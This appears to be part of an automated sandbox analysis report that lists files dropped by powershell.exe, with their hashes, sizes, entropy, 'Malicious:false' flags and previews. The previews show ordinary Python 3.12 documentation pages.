                                                                                                    SSDEEP:768:WpbrVPRqyfCNMXQKwVoekLBWjk/RyZeyfrly3KbLXEcEkLFTQk/eyf7yU4QKWOjl:obrJRqyOM5wVoekLBWjk/RyZeyfxy3Ke
                                                                                                    MD5:4AC53569CEF4C29C4178C54C61E94216
                                                                                                    SHA1:2C2AA70F585E225BB20D459CB13619E8612B9C3A
                                                                                                    SHA-256:9E48163646582AA08C2B5B360DAA3A5C088C721725D6A0AA756AAB90BBB2E7FE
                                                                                                    SHA-512:57E022C110F79D5E6F56DF3C039BDBA12F8656C388707EFD222354E814BE3329932A9B9C95F88405E1E015F20461E9CA477365743E1E32A23D756BA826451B75
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="zlib . Compression compatible with gzip" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/zlib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="For applications that require data compression, the functions in this module allow compression and decompression, using the zlib library. The zlib library has its own home page at https://www.zlib...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="For applications that require data compres
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (754), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):62411
                                                                                                    Entropy (8bit):4.880087177661371
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:oqyCMQKZRhZ3FelHx5WAo7/MyFI55ZXNEyF68FGlVQgV9XTc+RyFLYSi2YNdMS75:YFkJUGPg
                                                                                                    MD5:A01D09AD8D4CA4C4C41865D34A0BA620
                                                                                                    SHA1:D16195BD582C28ADDE7898F7C059C76C20A82AB3
                                                                                                    SHA-256:236D0F12235CAFCE242D2F30E79C5226CE8B3FE69E6A97AD414AA97F5F585195
                                                                                                    SHA-512:9F5A0BBD936A5FB79F52FF58BAAA58AAAC18FA09522778C082DF66E35A29B1B3532F85920D7046CDCA56E884537BF12234A09E735A96B3190EB2FCC7ED68EE92
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="zoneinfo . IANA time zone support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/zoneinfo.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/zoneinfo The zoneinfo module provides a concrete time zone implementation to support the IANA time zone database as originally specified in PEP 615. By default, zoneinfo uses the s..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/zoneinfo The zoneinfo modul
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (979), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):83202
                                                                                                    Entropy (8bit):5.274296806827522
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:xtPanogZMiunuiDUDVT6qds/By4VWZNQS3bbBY6KLQpuBDLk2RD/hZ8Lmd7qoxCu:WnogAu6UD8qWZySCNX3RYLQpgLLDf8EZ
                                                                                                    MD5:5F357BB94915B051AB4C875311698FA8
                                                                                                    SHA1:3A530B4D698DF9237E66F2E171C66BF0B4636578
                                                                                                    SHA-256:BF71F4B815EDC8670945F8F03EEC681F4F8378249D3027DC795A7031AF57400F
                                                                                                    SHA-512:B494D0ABA488F2BABD1A68CE2FDA45CB7F5D626F624E1628FEDF2D895A882F1471BEF64AF64B51F166A4DFD00BEA6C39EFA94D0C970DE2810121CEAF6C79F477
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="History and License" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/license.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="History of the software: Python was created in the early 1990s by Guido van Rossum at Stichting Mathematisch Centrum (CWI, see https://www.cwi.nl/) in the Netherlands as a successor of a language c..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="History of the software: Python was created in the early 1990s by Guid
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):136209
                                                                                                    Entropy (8bit):7.997985342944632
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:MbzU6mR9iG2fw5FTFelZWozd0p1tfj/OesSfhpb1IZeA6eeWgkq:mTmRkG2fw5FTFe/W/7ASZpCIl6q
                                                                                                    MD5:2CD58DC69582544FF51F28BE1CC1AF4C
                                                                                                    SHA1:F28EB3585A5F01B0658B766FEB99DDF04735C317
                                                                                                    SHA-256:2763E6F9DB4CC8AFA0A4C5CDE2D2F835E8D154EA1BFCEDC361EFD1F90D75B170
                                                                                                    SHA-512:2BC2B4799A4AFA08561AF3E46C8E476A630A806E46C759E5F3B289DB8BA170F978C57147E6BFB3BC1FEF2802ED067CBB0097F72207D120A40F660C8E7BA7AA88
                                                                                                    Malicious:false
                                                                                                    Preview:# Sphinx inventory version 2.# Project: Python.# Version: 3.12.# The remainder of this file is compressed using zlib..x...r.8..x..bE.]..\..*......E93.o.4...H.I.v?...A......&.*3%.;.| .\=F7...:..|....H..._H......?.*....x....k{...$......~...]........7m}J.SM.).q.s.. ..U..Z..A0......Yc.<^C.....-H...8.v.+...j.p.....>.~._m.h..'0Z.....y..7(d......W.{.F...@J......R.de."7W.G$....].W.:.[._...z.Y....W..-............on...z%q.O.<...O...j.:.z%./.....aFdF.5..R.<.u|..d...^m6./.$IK.....S.%eJ...#$..eCZ3 ....."....c..&.Q..N..........">...O.QW...2...q..;U9.8.`.wZ..T<Ll."..|..u. .%..Q......w..5M..Py[........\..`..j:.c.. YV,GV.G...=.5[}x`..**...x..A7..<......LD....A+.}..y...4nI....t$E.X...".'.k.SW.i....?. >F1..M'.n...X..UFb.R....7....:.}.mn....s...~........G.Gw......~.s.......C"p.....z..3!g...gD1...k.....0.=g.M....S..xxH.......{..vs.....9...H..nv...80..=..27O._......$F...<... :@.3Dw..yv.Y.4x.Q..Ou..u.B..e..H..k.*.k...!...&..h..<5a[g).v...d..h.vl....2.Y."..I..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87543
                                                                                                    Entropy (8bit):4.747233786343842
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:LtPQM4R/G76RdVnn2XIpvbPHPdvBNGt7p3sasFf6659S5IkVqb/jMY764N:LtPQM4R/uIVbPgt7pOp6dJcb/jMY764N
                                                                                                    MD5:D484D95EABA8098B3CA961C3033CFC4F
                                                                                                    SHA1:FAD3B8388FE74AE35AD07ECB716EC3EF7B7F0964
                                                                                                    SHA-256:F652586323B8D47C3B214993EBB39A431A3AA4853877A711B3BADBF6DAC1B77D
                                                                                                    SHA-512:61466544806CE951E5443071EB11B28AB7310214648E23CC7B299FDF5ACF971D1E812029047D05214B359CBB7B9CCC961522A9B3BC8F4F4BEF3E1AE5C127C8E5
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Python Module Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml"..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (705), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):210816
                                                                                                    Entropy (8bit):4.824208745627629
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:8oqAkBqVcN1cyeE3QKcnqLHYv4mCABsWoKrGr2kYdrNhcCwBLyE0RcU4Jg:83VeUg
                                                                                                    MD5:70DA210F23B13B8E19A672B45FA35EEB
                                                                                                    SHA1:9C243D9B2E6ADB356320FB2E06CFF5B7813A851A
                                                                                                    SHA-256:EC96105C712A9DE979B1A4E8B7355C5494740FC7B5CABAD46432A0190C389A2F
                                                                                                    SHA-512:064C371E403B554D6278F6D9D67675A3CE4F14676398655B889F43CEC55C7F9585C55817336DBB656AD94DE39080C6B19C5D751443CB2325B2880959334158EC
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="8. Compound statements" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/compound_stmts.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Compound statements contain (groups of) other statements; they affect or control the execution of those other statements in some way. In general, compound statements span multiple lines, although i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Compound statements contain (groups of) other sta
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (547), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):408104
                                                                                                    Entropy (8bit):4.81949445159808
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Uu45CJnyPXNt3Brlv0/6R6Nr5T3tSyabccAu7jlhhEZErPX+wNXYllSRchD7mv7p:Uu4BkLg
                                                                                                    MD5:19B677F532FB75D5A9AC791F3F5C278E
                                                                                                    SHA1:BF0935017BBAB427EB1F5469453A33F1A9425937
                                                                                                    SHA-256:C950F178E5C51078A3ACD630812C455028485977D101C4A6674C32E171DCE8E4
                                                                                                    SHA-512:8D14301608D98ECF8C92AB1BD62D16589F9AD9ED4603ED9A31033204AD2655634C2D17A714839307EEAFF46853273740E950F6E212F7FDB8495BE576D5D4F385
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. Data model" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/datamodel.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Objects, values and types: Objects are Python.s abstraction for data. All data in a Python program is represented by objects or by relations between objects. (In a sense, and in conformance to Von ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Objects, values and types: Objects are Python.s abstraction
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (535), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48337
                                                                                                    Entropy (8bit):4.828969417941886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:BKqyqMhw/Mf2CfYHLzDArBD+CAlteciwq1wMKMQgDM+764N:BKqyqi4MxSHDA9DBAlte3wq1jKjGM+75
                                                                                                    MD5:EA7826715CB07101D17FAB7FC5C26C25
                                                                                                    SHA1:F5C8B24E21CB7ACAB6D6593AA4FF1030FCBBE343
                                                                                                    SHA-256:28763A1ADDFAECD4C8F85C771AC28B560785425F846B0CD9405B6998119EC043
                                                                                                    SHA-512:A700DAF294F4D0C41A24915FBB6AC398FF96E22ACBF4E39EE3C92C9562FF274F8A7A2EA551315CF71C2C28F9380F7E90604A1E5349B4A227D224FAC81FAAE9FE
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. Execution model" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/executionmodel.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Structure of a program: A Python program is constructed from code blocks. A block is a piece of Python program text that is executed as a unit. The following are blocks: a module, a function body, ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Structure of a program: A Python program is construct
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (787), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):214602
                                                                                                    Entropy (8bit):4.8178642542737204
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:NwRUug6blXRZvHmSVd/SMk8E8Ch0VGwibvfc+Ngw6UqM2MpJ9czSMkiXVieRjlg:sblXRZvHmm/YVD6UqM2MpJ9czYqVi0g
                                                                                                    MD5:E924F56A3041BCCE730F388B5C55A286
                                                                                                    SHA1:97F99F35052DEABAE91F8D3C729B1C3C2E827CC0
                                                                                                    SHA-256:559F85BDE1E9181E5B1F9AB6DF641897293476946156A5C849E11611EF1A1B27
                                                                                                    SHA-512:48B5979303AB3D1441895FA489CB835D11F49843D9F866E12B39D5D2108D4AA297756E35EF639B0853AFCD5CDB0CFBC98798F408FC5EA51ED17954C72A6F7514
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="6. Expressions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/expressions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter explains the meaning of the elements of expressions in Python. Syntax Notes: In this and the following chapters, extended BNF notation will be used to describe syntax, not lexical anal..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter explains the meaning of the elements of express
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (496), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86968
                                                                                                    Entropy (8bit):4.827065448900192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:pqyjMF3JEYFl3tnTqYl7VEeko8yBc+g/L+z40QbaelXiboiXsq36wFy6L9W8WtCu:TYFOaelWLg
                                                                                                    MD5:AB860A41EA3AF53E736B71B2ABE32A83
                                                                                                    SHA1:8C24DC68D40EFC21C2E1660F184DB2B8FA1336EF
                                                                                                    SHA-256:8FC09DA010F5103D724B0C1EE2FC0C874DD60D366DD66369EDF0CD182BD3BAE6
                                                                                                    SHA-512:E11CE602F622750F0CC4F66E0790FE019D554DA3E658DE2ADD172362EE762E1969E90AF23C3EF95AD625AA2BC7B2CBC39EED508C8F491885E778BE3B756C3CC2
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="10. Full Grammar specification" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/grammar.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This is the full Python grammar, derived directly from the grammar used to generate the CPython parser (see Grammar/python.gram). The version here omits details related to code generation and error..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This is the full Python grammar, derived directl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (456), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):132461
                                                                                                    Entropy (8bit):4.8223879056791406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:moYFQTaTG+aXNf90CHRfaoZ4M6Prw+ITWcuvn7de5Tlfn+hTkRwyR+/tM8OXGlcT:ATm0CHRfaoZ4M6PM+iP0KTlP+hTkRwyF
                                                                                                    MD5:B5EC170ED6ABED99CF428EF9D9CF4E00
                                                                                                    SHA1:F0B3821E51D90A3E5604F9BF7A26F7D3FD5BA85D
                                                                                                    SHA-256:767F5D82361A1758B51BDE416D3F4F6207EBE879D78BC586225D9FAB40F2304C
                                                                                                    SHA-512:BE0FB8CFCC45131BE6C0C47C03B04715F6ED72FEB55D26F5CA55C90BF24E8064BDD2F71D689DC630359DD51B6118F04A79B79B86BDB52A262CB7B4646E501536
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="5. The import system" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/import.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python code in one module gains access to the code in another module by the process of importing it. The import statement is the most common way of invoking the import machinery, but it is not the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python code in one module gains access to the code in anoth
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26005
                                                                                                    Entropy (8bit):4.853787939450621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ZHqklSBJnETM+IhqyRCb8t4UkK5APIBKCMkBuXteacXn6TMR76dqEC:pqySvKM3e8taGYMR764N
                                                                                                    MD5:8F3C4834FBA1A9AF3D135002273C372A
                                                                                                    SHA1:A09DD9D977F6EBD76EB28012D940C098E76C74EA
                                                                                                    SHA-256:76B32A0F4597A3C133D255B02651FD51123168660F04E1C7B8F359612448AD85
                                                                                                    SHA-512:FD6894E2DD8379D67FF3855CFEFB3F58E2500F2505BD66B72C3CB304CB7A83FD4B14437CB463ABC773C733C7CD084E31956AB9F92312C94FCE892D9F0E70E3FA
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Python Language Reference" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This reference manual describes the syntax and .core semantics. of the language. It is terse, but attempts to be exact and complete. The semantics of non-essential built-in object types and of the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This reference manual describes the syntax and
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (413), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22349
                                                                                                    Entropy (8bit):4.851934490667887
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:XHqkl/DbrnITMhXYtkGo+1qdR92c6D2tn+TM876dqEC:3qyLnmM1YsR9vCGUM8764N
                                                                                                    MD5:A691066EA33ADDCFD11C072BD33993AC
                                                                                                    SHA1:4038D5E8DE4A65A5CE83DD4BEFAF4009AC80236E
                                                                                                    SHA-256:E72682EF9468B4CC548F3FCF017E242DD28D2DD06FF42C17DA3AAFC6C2D279BA
                                                                                                    SHA-512:99F18794A3BBDF38179378E96E68C7250A5D0871EF65FA6ABC4D425023980C73676A8A605C6AFF5C216B35E044E3DA901894B82E1C334C241D4D9AB8164F8767
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Introduction" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/introduction.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This reference manual describes the Python programming language. It is not intended as a tutorial. While I am trying to be as precise as possible, I chose to use English rather than formal specific..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This reference manual describes the Python programming lan
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (615), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106796
                                                                                                    Entropy (8bit):4.907913662970218
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Yqye8M+TPit0NcIu1fw56/2ATSNaGPiR0fwWPJ7r1tY/FlV3Mh764N:TrfQ6/9UfLqXg
                                                                                                    MD5:A9F1E6AC3F35FC56A7119F34855A37D0
                                                                                                    SHA1:6AFFA723D30B26C9ABBE775C514C05EB53CF3256
                                                                                                    SHA-256:0F274DA24B6D5C319E832DFEBB54794EA6C9067B87CB66D641485BB00940922B
                                                                                                    SHA-512:7E973C7873973B5DC5DF997B784B7275135D604BB7847B209F9F6161DEFD55FA33065FEFB640A4B23A38DB364C8F699A8460013035D2FBDA6EC009B742F0FF77
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="2. Lexical analysis" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/lexical_analysis.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A Python program is read by a parser. Input to the parser is a stream of tokens, generated by the lexical analyzer. This chapter describes how the lexical analyzer breaks a file into tokens. Python..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A Python program is read by a parser. Input to the
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (860), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):113127
                                                                                                    Entropy (8bit):4.799817155079819
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:sTn3TnJqymHMfTldxIIYcwNcTMkf0dP9k9ok5X8on6fGa6nKP4PryMU764N:sTn3TnyaTlgcwx3dUX8m6OaQdZg
                                                                                                    MD5:6CCBFA5B4E6BF8501587A488786D2635
                                                                                                    SHA1:3C7A562DACB7EA264EEE449DBF56F0295B02AF0A
                                                                                                    SHA-256:10BF1E0E4A8E0A3E2140753C4098B02E94E55B0F27C4C019D9EC05D5F1E76F98
                                                                                                    SHA-512:E5E18BD9E798A5EE7C3D49CBDDF200046B6AA84C128F661DBF2388ABF7FE1DEDAF15853742B92CB376082EC031354ADFD80F44F8D487DEF8DB6C47A09C83EE72
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="7. Simple statements" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/simple_stmts.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A simple statement is comprised within a single logical line. Several simple statements may occur on a single line separated by semicolons. The syntax for simple statements is: Expression statement..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A simple statement is comprised within a single logic
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (523), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20642
                                                                                                    Entropy (8bit):4.866097626874894
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zNHqkltNpnnUTMzVlJSIN0RnKTMg76dqEC:z9qytNRaMJFNQoMg764N
                                                                                                    MD5:855FC1F28AE48D6D0026BF878A8C0A93
                                                                                                    SHA1:1411C76B5DCD8B733E97B26CDD149135EC97E5D8
                                                                                                    SHA-256:991719A44F397AB2DE74EC7B8D502DCD45FEA8FDDF4B4138C0BB4EDB01F1AF47
                                                                                                    SHA-512:34DE4E771A41174510FD87C84BDAC0C210C0CA39B16E4690211A530DBD21785E432E83B729F0F5CFF27994474AD4E44410F921D8B88893D79F8349131E737C83
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="9. Top-level components" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/toplevel_components.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Python interpreter can get its input from a number of sources: from a script passed to it as standard input or as program argument, typed in interactively, from a module source file, etc. This ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Python interpreter can get its input fr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11148
                                                                                                    Entropy (8bit):4.70989023871701
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0rjUywtrRMJ60vntvvjNrcMGVLTO2pNTkcMGVZ76dqEC:3ywtKs0vntvVcMIUcMq76dqEC
                                                                                                    MD5:C7F8B72A770B04EFAAF02C553997D6C4
                                                                                                    SHA1:32630665A1F1B874FC3A6513DE8D0A56C0ECEF12
                                                                                                    SHA-256:A1173CF7147ADDA4370B2A8AC2E97E5CAEFBF7D5E60EDE8D837817792887265E
                                                                                                    SHA-512:96C282798FBC3CD144383D114B74BCC4B2F9E8C1B3A5BBCA3CA14F9F3AA0572C6E67D78050E10DE098C1316327CDF70DD0C5B375289D6E2C742BE10130B76712
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Search &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <script src="_static/searchtools.js"></script>.. <script src="_static/language
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3446258
                                                                                                    Entropy (8bit):5.096774962739672
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:iBPGfACWcz683Nz8T8//s6fTKG8yj/iAJs:3zX/UMKMbO
                                                                                                    MD5:D1F162987C134B056E31AABC710D52C2
